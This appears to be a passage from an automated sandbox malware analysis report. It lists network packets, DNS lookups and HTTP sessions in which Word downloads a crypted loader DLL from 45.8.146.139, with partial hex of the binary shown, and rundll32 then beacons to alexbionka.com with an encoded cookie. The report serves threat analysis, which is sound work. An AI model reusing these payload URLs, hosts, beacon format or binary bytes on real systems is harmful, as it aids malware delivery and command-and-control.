Aug 11, 2022 17:38:27.316847086 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.316890001 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.316907883 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.316947937 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.316971064 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.317034006 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.317094088 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.317121983 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.317127943 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.317150116 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.317207098 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.317228079 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.317231894 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.317270041 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.317316055 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.317318916 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.317344904 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.317382097 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.317492008 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.317553043 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.317553997 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.317591906 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.317619085 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.317672014 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.317682028 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.317778111 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.317792892 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.317836046 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.317851067 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.317888021 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.317907095 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.317948103 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.317961931 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318002939 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318022013 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318063021 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318083048 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318141937 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318147898 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318197966 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318203926 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318254948 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318267107 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318305969 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318327904 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318371058 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318388939 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318428993 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318450928 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318490982 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318506002 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318545103 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318545103 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318582058 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318584919 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318620920 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318628073 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318665028 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318665981 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318706036 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318732023 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318742990 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318762064 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318800926 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318821907 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318860054 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318870068 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318907022 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318928957 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.318969011 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.318988085 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319027901 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319047928 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319087982 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319091082 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319129944 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319144964 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319185972 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319207907 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319248915 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319263935 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319300890 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319305897 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319344044 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319360018 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319389105 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319442034 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319488049 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319505930 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319546938 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319566011 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319608927 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319632053 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319680929 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319713116 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319744110 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319781065 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319782972 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319792032 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319823027 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319825888 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319863081 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319873095 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319900036 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319902897 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319941044 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.319943905 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319982052 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.319986105 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.320020914 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.320024967 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.320064068 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.320091009 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.320101976 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.320105076 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.320142984 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.320143938 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.320184946 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.320203066 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.320245028 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.320255995 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.320297956 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.320318937 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.320362091 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.320364952 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.320401907 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.320405006 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.320442915 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.320444107 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.320483923 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.320485115 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.320524931 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.643306971 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.643423080 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:32.115506887 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:32.115722895 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:36.246077061 CEST | 49174 | 80 | 192.168.2.22 | 64.227.108.27
Aug 11, 2022 17:38:36.434330940 CEST | 80 | 49174 | 64.227.108.27 | 192.168.2.22
Aug 11, 2022 17:38:36.434499025 CEST | 49174 | 80 | 192.168.2.22 | 64.227.108.27
Aug 11, 2022 17:38:36.435995102 CEST | 49174 | 80 | 192.168.2.22 | 64.227.108.27
Aug 11, 2022 17:38:36.622642040 CEST | 80 | 49174 | 64.227.108.27 | 192.168.2.22
Aug 11, 2022 17:38:37.107072115 CEST | 80 | 49174 | 64.227.108.27 | 192.168.2.22
Aug 11, 2022 17:38:37.313636065 CEST | 49174 | 80 | 192.168.2.22 | 64.227.108.27
Aug 11, 2022 17:38:38.160131931 CEST | 49174 | 80 | 192.168.2.22 | 64.227.108.27
Aug 11, 2022 17:39:44.189764023 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 11, 2022 17:38:36.178013086 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
Aug 11, 2022 17:38:36.195198059 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
Aug 11, 2022 17:38:36.213418007 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8
Aug 11, 2022 17:38:36.233592987 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 11, 2022 17:38:36.178013086 CEST | 192.168.2.22 | 8.8.8.8 | 0x26e4 | Standard query (0) | alexbionka.com | A (IP address) | IN (0x0001)
Aug 11, 2022 17:38:36.213418007 CEST | 192.168.2.22 | 8.8.8.8 | 0xa642 | Standard query (0) | alexbionka.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 11, 2022 17:38:36.195198059 CEST | 8.8.8.8 | 192.168.2.22 | 0x26e4 | No error (0) | alexbionka.com | | 64.227.108.27 | A (IP address) | IN (0x0001)
Aug 11, 2022 17:38:36.233592987 CEST | 8.8.8.8 | 192.168.2.22 | 0xa642 | No error (0) | alexbionka.com | | 64.227.108.27 | A (IP address) | IN (0x0001)
                                            • 45.8.146.139
                                            • alexbionka.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49173 | 45.8.146.139 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
Aug 11, 2022 17:38:26.663358927 CEST | 0 | OUT | GET /fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll HTTP/1.1
                                            Accept: */*
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: 45.8.146.139
                                            Connection: Keep-Alive
Aug 11, 2022 17:38:26.792161942 CEST | 2 | IN | HTTP/1.1 200 OK
                                            Date: Thu, 11 Aug 2022 15:38:26 GMT
                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                            X-Powered-By: PHP/7.2.34
                                            Content-Description: File Transfer
                                            Content-Disposition: attachment; filename="loader_p3_dll_64_n3_crypt_x64_asm_clone_n14.dll"
                                            Expires: 0
                                            Cache-Control: must-revalidate
                                            Pragma: public
                                            Content-Length: 360448
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: application/octet-stream
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 55 ef 34 c3 11 8e 5a 90 11 8e 5a 90 11 8e 5a 90 02 e9 59 91 10 8e 5a 90 59 e0 5a 91 10 8e 5a 90 33 e6 a5 90 10 8e 5a 90 6a e1 58 91 10 8e 5a 90 52 69 63 68 11 8e 5a 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 59 d1 f4 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 0e 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 0a 00 06 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 91 9d 05 00 03 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 05 00 7d 01 00 00 00 00 00 00 00 00 00 00 00 a0 05 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 77 05 00 00 10 00 00 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7d 01 00 00 00 90 05 00 00 02 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 a0 05 00 00 02 00 00 00 7e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U4ZZZYZYZZ3ZjXZRichZPEdYb" x`}.textwx `.rdata}|@@.rsrc~@@
Aug 11, 2022 17:38:26.792212963 CEST | 3 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii: H_IIHLD$T$:tHL$Hf;tD$($:tHIHsvIHD$
Aug 11, 2022 17:38:26.792253971 CEST | 4 | IN | Data Raw: 00 00 00 ae 00 00 00 c7 84 24 9c 00 00 00 05 00 00 00 e9 60 ff ff ff 81 84 24 84 00 00 00 a2 00 00 00 c7 84 24 88 00 00 00 0c 00 00 00 3a ff 74 00 83 84 24 88 00 00 00 21 c7 84 24 8c 00 00 00 00 00 00 00 66 3b ff 74 00 83 84 24 8c 00 00 00 4c c7
                                            Data Ascii: $`$$:t$!$f;t$L$f:t$$$$f;tD$hD$lf;D$`D$d:t5D$TD$X?f;tD$XD$\f;t#D$PTD$T:tD$dD
Aug 11, 2022 17:38:26.792294025 CEST | 6 | IN | Data Raw: 00 00 83 c0 32 3a e4 74 d8 b8 34 00 00 00 83 c0 36 e9 37 03 00 00 b8 57 00 00 00 83 c0 0f 66 3b c9 74 0a 83 c0 44 66 89 44 24 60 eb dc 66 89 44 24 5e b8 29 00 00 00 3a f6 74 e8 b8 34 00 00 00 83 c0 37 66 3b e4 0f 84 7b ff ff ff 48 83 bc 24 a0 01
                                            Data Ascii: 2:t467Wf;tDfD$`fD$^):t47f;{H$t$u3H$_^:L$HT$pf;tH$$9L$pH$h:tH$`T$x$@m$D:t1$L
Aug 11, 2022 17:38:26.792332888 CEST | 7 | IN | Data Raw: 00 e9 6c fc ff ff 83 84 24 14 01 00 00 0a c7 84 24 18 01 00 00 25 00 00 00 66 3b ed 0f 84 74 ff ff ff 33 c0 48 81 c4 48 02 00 00 e9 11 fb ff ff 8b 44 24 30 ff c0 e9 96 02 00 00 33 c0 eb e5 48 c7 84 24 98 00 00 00 00 00 00 00 e9 80 00 00 00 48 83
                                            Data Ascii: l$$%f;t3HHD$03H$H$t$uAXA\HAAHHHIV!IH3H|$xu!H$H$uf;t3aD$xHD$pR$
Aug 11, 2022 17:38:26.792371035 CEST | 8 | IN | Data Raw: 00 00 66 3b ff 74 00 c7 84 24 d8 00 00 00 16 00 00 00 83 84 24 d8 00 00 00 40 eb b8 c7 84 24 c4 00 00 00 c0 00 00 00 81 84 24 c4 00 00 00 85 00 00 00 3a f6 74 17 c7 84 24 c0 00 00 00 32 03 00 00 83 84 24 c0 00 00 00 03 3a e4 74 cf c7 84 24 c8 00
                                            Data Ascii: f;t$$@$$:t$2$:t$.$f;t$$:f;t/$%$f;t$A$:t$$:Af;t-H$P:tD
Aug 11, 2022 17:38:26.792409897 CEST | 10 | IN | Data Raw: 81 84 24 ec 00 00 00 de 00 00 00 3a ff 74 79 c7 84 24 e0 00 00 00 90 02 00 00 83 84 24 e0 00 00 00 6d 3a ed 74 4a c7 84 24 f8 00 00 00 52 00 00 00 83 84 24 f8 00 00 00 04 3a c0 74 17 c7 84 24 f4 00 00 00 02 00 00 00 83 84 24 f4 00 00 00 16 3a e4
                                            Data Ascii: $:ty$$m:tJ$R$:t$$:t$$of;X$$f;t$P$f;t$($f;9D$@0D$@:tYD$`D$`T$D$HD$Ho:tD$
Aug 11, 2022 17:38:26.792449951 CEST | 11 | IN | Data Raw: d8 00 00 00 ae 00 00 00 c7 84 24 dc 00 00 00 05 00 00 00 eb 97 83 84 24 c8 00 00 00 21 c7 84 24 cc 00 00 00 00 00 00 00 3a c9 74 00 83 84 24 cc 00 00 00 4c c7 84 24 d0 00 00 00 66 00 00 00 66 3b c9 0f 84 48 ff ff ff 81 84 24 d4 00 00 00 b3 00 00
                                            Data Ascii: $$!$:t$L$ff;H$$:t$$f;d$z$\f;t3HL$8f;tT$hHL$@:t$HL$8T$`:tD$0AHD$@HD$ >u3
Aug 11, 2022 17:38:26.792489052 CEST | 13 | IN | Data Raw: 84 24 fc 00 00 00 12 00 00 00 3a c0 74 cf 81 84 24 04 01 00 00 8b 00 00 00 c7 84 24 08 01 00 00 16 00 00 00 e9 52 ff ff ff 83 84 24 e0 00 00 00 2d c7 84 24 e4 00 00 00 41 00 00 00 66 3b c0 0f 84 4e ff ff ff 83 84 24 f0 00 00 00 03 c7 84 24 f4 00
                                            Data Ascii: $:t$$R$-$Af;N$$:K$$:tH&I%HXIIcIIIL#HIH$P$Tf;t$T$X$<
Aug 11, 2022 17:38:26.792529106 CEST | 14 | IN | Data Raw: 88 44 24 20 48 8b 44 24 30 66 3b d2 74 3d 41 83 c0 0f 33 d2 3a d2 74 d7 48 8b c1 8a 00 66 3b db 74 de 48 8b 8c 24 88 00 00 00 4c 8b 01 e9 34 fe ff ff 8a 4c 24 21 e8 d6 01 00 00 e9 8a 01 00 00 48 8b c1 8a 40 01 66 3b ff 74 97 48 8b 4c 24 38 48 03
                                            Data Ascii: D$ HD$0f;t=A3:tHf;tH$L4L$!H@f;tHL$8Hf;tkH@`uH|$(rAHD$(HwHxHD$0HD$(IHIHdHD$0HLHI"I_IHfI\IM3M_HAUHA]H
Aug 11, 2022 17:38:26.900171995 CEST | 16 | IN | Data Raw: d4 8b 44 24 04 89 44 24 08 eb 35 c3 41 50 41 ff d6 49 81 c3 07 06 00 00 48 25 54 03 00 00 4d 0f a4 f5 59 48 81 e5 a4 11 00 00 49 f7 fb 49 ff c1 53 4c 87 d9 e4 9a c3 49 13 e3 48 f7 f4 4c 03 c1 8b 44 24 08 48 83 c4 18 e9 67 ff ff ff 8b 04 24 89 44
                                            Data Ascii: D$D$5APAIH%TMYHIISLIHLD$Hg$D$Hm"H3HHPHHHIHI6!IIHHM#9D$49D$,}:D$$D$8xgHPHMiIIIMAII


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49174 | 64.227.108.27 | 80 | C:\Windows\System32\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Aug 11, 2022 17:38:36.435995102 CEST | 384 | OUT | GET / HTTP/1.1
                                            Connection: Keep-Alive
                                            Cookie: __gads=3570055661:1:6727:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323834393932:416C627573:31463945303738373942323239343237; __io=0; _gid=67AFEDC5AC03
                                            Host: alexbionka.com
Aug 11, 2022 17:38:37.107072115 CEST | 384 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 11 Aug 2022 15:38:37 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 30 63 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 78 62 69 6f 6e 6b 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
